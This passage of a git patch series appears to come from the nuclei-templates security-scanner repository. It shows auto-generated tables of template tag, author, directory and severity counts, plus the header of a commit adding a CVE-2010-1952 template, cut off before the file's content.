1 | | | | | | | +| httpd | 3 | yashanand155 | 1 | | | | | | | +| log | 3 | naglinagli | 1 | | | | | | | +| firebase | 3 | tim_koopmans | 1 | | | | | | | +| lfr | 3 | ajaysenr | 1 | | | | | | | +| fpd | 3 | ooooooo_q | 1 | | | | | | | +| jellyfin | 3 | thezakman | 1 | | | | | | | +| mail | 3 | alex | 1 | | | | | | | +| caucho | 3 | kabirsuda | 1 | | | | | | | +| fanruan | 3 | petruknisme | 1 | | | | | | | +| vbulletin | 3 | omarkurt | 1 | | | | | | | +| amazon | 3 | knassar702 | 1 | | | | | | | +| kafka | 3 | divya_mudgal | 1 | | | | | | | +| slack | 3 | patralos | 1 | | | | | | | +| nosqli | 3 | d0rkerdevil | 1 | | | | | | | +| backups | 3 | fopina | 1 | | | | | | | +| git | 3 | toufik airane | 1 | | | | | | | +| bitrix | 3 | luci | 1 | | | | | | | +| nexus | 3 | undefl0w | 1 | | | | | | | +| openam | 3 | thevillagehacker | 1 | | | | | | | +| ebs | 3 | exploitation | 1 | | | | | | | +| tikiwiki | 3 | sshell | 1 | | | | | | | +| npm | 3 | bad5ect0r | 1 | | | | | | | +| oa | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| oauth | 2 | bernardofsr | 1 | | | | | | | +| backdoor | 2 | 0xrod | 1 | | | | | | | +| nextjs | 2 | x6263 | 1 | | | | | | | +| axis2 | 2 | pdp | 1 | | | | | | | +| yapi | 2 | defr0ggy | 1 | | | | | | | +| sonarqube | 2 | taielab | 1 | | | | | | | +| igs | 2 | sullo | 1 | | | | | | | +| prestashop | 2 | intx0x80 | 1 | | | | | | | +| leak | 2 | b4uh0lz | 1 | | | | | | | +| paloalto | 2 | 0xteles | 1 | | | | | | | +| adminer | 2 | izn0u | 1 | | | | | | | +| middleware | 2 | regala_ | 1 | | | | | | | +| splunk | 2 | bjhulst | 1 | | | | | | | +| trixbox | 2 | mesaglio | 1 | | | | | | | +| axis | 2 | sec_hawk | 1 | | | | | | | +| odoo | 2 | whynotke | 1 | | | | | | | +| maian | 2 | 0h1in9e | 1 | | | | | | | +| favicon | 2 | philippdelteil | 1 | | | | | | | +| azure | 2 | furkansenan | 1 | | | | | | | +| seeyon | 2 | j33n1k4 | 1 | | | | | | | +| wordfence | 2 | kre80r | 1 | | | | | | | +| idrac | 2 | zhenwarx | 1 | | | | | | | +| icewarp | 2 | alph4byt3 | 1 | | | | | | | +| cve2005 | 2 | ohlinge | 1 | | | | | | | +| rockethchat | 2 | _darrenmartyn | 1 | | | | | | | +| db | 2 | push4d | 1 | | | | | | | +| waf | 2 | 52971 | 1 | | | | | | | +| voipmonitor | 2 | makyotox | 1 | | | | | | | +| nagios | 2 | luskabol | 1 | | | | | | | +| liferay | 2 | ldionmarcil | 1 | | | | | | | +| storage | 2 | ilovebinbash | 1 | | | | | | | +| ilo | 2 | sy3omda | 1 | | | | | | | +| chamilo | 2 | cookiehanhoan | 1 | | | | | | | +| openfire | 2 | wabafet | 1 | | | | | | | +| huawei | 2 | manuelbua | 1 | | | | | | | +| frp | 2 | gboddin | 1 | | | | | | | +| hashicorp | 2 | aresx | 1 | | | | | | | +| shellshock | 2 | _harleo | 1 | | | | | | | +| xxljob | 2 | flag007 | 1 | | | | | | | +| spark | 2 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| smb | 2 | soyelmago | 1 | | | | | | | +| flir | 2 | apt-mirror | 1 | | | | | | | +| saltstack | 2 | berkdusunur | 1 | | | | | | | +| sonicwall | 2 | borna nematzadeh | 1 | | | | | | | +| globalprotect | 2 | kurohost | 1 | | | | | | | +| hjtcloud | 2 | hanlaomo | 1 | | | | | | | +| glassfish | 2 | willd96 | 1 | | | | | | | +| node | 2 | retr0 | 1 | | | | | | | +| ucmdb | 2 | hakluke | 1 | | | | | | | +| dos | 2 | mass0ma | 1 | | | | | | | +| couchdb | 2 | _c0wb0y_ | 1 | | | | | | | +| akkadian | 2 | shelld3v | 1 | | | | | | | +| cache | 2 | tirtha_mandal | 1 | | | | | | | +| mcafee | 2 | pudsec | 1 | | | | | | | +| hasura | 2 | becivells | 1 | | | | | | | +| rstudio | 2 | th3.d1p4k | 1 | | | | | | | +| guacamole | 2 | ipanda | 1 | | | | | | | +| hoteldruid | 2 | affix | 1 | | | | | | | +| jeedom | 2 | sickwell | 1 | | | | | | | +| hostheader-injection | 2 | evolutionsec | 1 | | | | | | | +| natshell | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| kong | 2 | notsoevilweasel | 1 | | | | | | | +| nextcloud | 2 | chron0x | 1 | | | | | | | +| status | 2 | ratnadip gajbhiye | 1 | | | | | | | +| fortios | 2 | rodnt | 1 | | | | | | | +| keycloak | 2 | mhdsamx | 1 | | | | | | | +| grav | 2 | ahmetpergamum | 1 | | | | | | | +| mida | 2 | infosecsanyam | 1 | | | | | | | +| ecology | 2 | me9187 | 1 | | | | | | | +| prtg | 2 | qlkwej | 1 | | | | | | | +| jboss | 2 | akshansh | 1 | | | | | | | +| jsf | 2 | raesene | 1 | | | | | | | +| webcam | 2 | noamrathaus | 1 | | | | | | | +| phpcollab | 2 | daviey | 1 | | | | | | | +| geowebserver | 2 | micha3lb3n | 1 | | | | | | | +| netis | 2 | rojanrijal | 1 | | | | | | | +| akamai | 2 | schniggie | 1 | | | | | | | +| showdoc | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| chiyu | 2 | elmahdi | 1 | | | | | | | +| service | 2 | smaranchand | 1 | | | | | | | +| hpe | 2 | yashgoti | 1 | | | | | | | +| cve2007 | 2 | 0xtavian | 1 | | | | | | | +| ec2 | 2 | nytr0gen | 1 | | | | | | | +| emerge | 2 | aceseven (digisec360) | 1 | | | | | | | +| pega | 2 | kareemse1im | 1 | | | | | | | +| rockmongo | 2 | adrianmf | 1 | | | | | | | +| dolibarr | 2 | alperenkesk | 1 | | | | | | | +| netsweeper | 2 | bolli95 | 1 | | | | | | | +| harbor | 2 | pratik khalane | 1 | | | | | | | +| bucket | 2 | 0ut0fb4nd | 1 | | | | | | | +| avantfax | 2 | zandros0 | 1 | | | | | | | +| yii | 2 | juicypotato1 | 1 | | | | | | | +| vrealize | 2 | its0x08 | 1 | | | | | | | +| activemq | 2 | jteles | 1 | | | | | | | +| github | 2 | dawid-czarnecki | 1 | | | | | | | +| plesk | 2 | | | | | | | | | +| sharepoint | 2 | | | | | | | | | +| kentico | 2 | | | | | | | | | +| totemomail | 2 | | | | | | | | | +| horde | 2 | | | | | | | | | +| bruteforce | 2 | | | | | | | | | +| expose | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| micrsoft | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| chyrp | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| lotus | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| s3 | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| qcubed | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| minio | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| getsimple | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| commax | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| linux | 1 | | | | | | | | | +| openvpn | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| cves2016 | 1 | | | | | | | | | +| tidb | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| actuator | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| aruba | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 869329e073..8f2daf4bdb 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | -| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | -| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | -| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | -| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | -| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | -| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | -| wp-plugin | 139 | princechaddha | 55 | file | 46 | | | | | -| cve2021 | 112 | pussycat0x | 55 | workflows | 35 | | | | | +| cve | 690 | dhiyaneshdk | 252 | cves | 696 | info | 625 | http | 1904 | +| lfi | 250 | pikpikcu | 250 | vulnerabilities | 291 | high | 540 | file | 46 | +| panel | 248 | daffainfo | 199 | exposed-panels | 247 | medium | 428 | network | 41 | +| xss | 227 | pdteam | 195 | exposures | 186 | critical | 267 | dns | 11 | +| exposure | 226 | geeknik | 151 | technologies | 178 | low | 147 | | | +| wordpress | 207 | dwisiswant0 | 132 | misconfiguration | 131 | | | | | +| rce | 195 | gy741 | 72 | takeovers | 63 | | | | | +| tech | 169 | madrobot | 62 | default-logins | 56 | | | | | +| cve2020 | 160 | princechaddha | 60 | file | 46 | | | | | +| wp-plugin | 140 | pussycat0x | 58 | workflows | 36 | | | | | From 403f152e0047d765a3a3fe5e0e580c5a6954a65e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 13 Sep 2021 20:34:38 +0000 Subject: [PATCH 259/339] Auto Update README [Mon Sep 13 20:34:38 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 5487e31afc..89a5851073 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | -| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | -| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | -| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | -| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | -| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | -| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | -| wp-plugin | 139 | princechaddha | 55 | file | 46 | | | | | -| cve2021 | 112 | pussycat0x | 55 | workflows | 35 | | | | | +| cve | 690 | dhiyaneshdk | 252 | cves | 696 | info | 625 | http | 1904 | +| lfi | 250 | pikpikcu | 250 | vulnerabilities | 291 | high | 540 | file | 46 | +| panel | 248 | daffainfo | 199 | exposed-panels | 247 | medium | 428 | network | 41 | +| xss | 227 | pdteam | 195 | exposures | 186 | critical | 267 | dns | 11 | +| exposure | 226 | geeknik | 151 | technologies | 178 | low | 147 | | | +| wordpress | 207 | dwisiswant0 | 132 | misconfiguration | 131 | | | | | +| rce | 195 | gy741 | 72 | takeovers | 63 | | | | | +| tech | 169 | madrobot | 62 | default-logins | 56 | | | | | +| cve2020 | 160 | princechaddha | 60 | file | 46 | | | | | +| wp-plugin | 140 | pussycat0x | 58 | workflows | 36 | | | | | -**150 directories, 2015 files**. +**164 directories, 2063 files**. From 83795af535ff95f71833a28720dd0c110ecd6c7c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 14 Sep 2021 05:11:22 +0700 Subject: [PATCH 260/339] Create CVE-2010-1952.yaml --- cves/2010/CVE-2010-1952.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1952.yaml diff --git a/cves/2010/CVE-2010-1952.yaml b/cves/2010/CVE-2010-1952.yaml new file mode 100644 index 0000000000..5e71f4a39f --- /dev/null 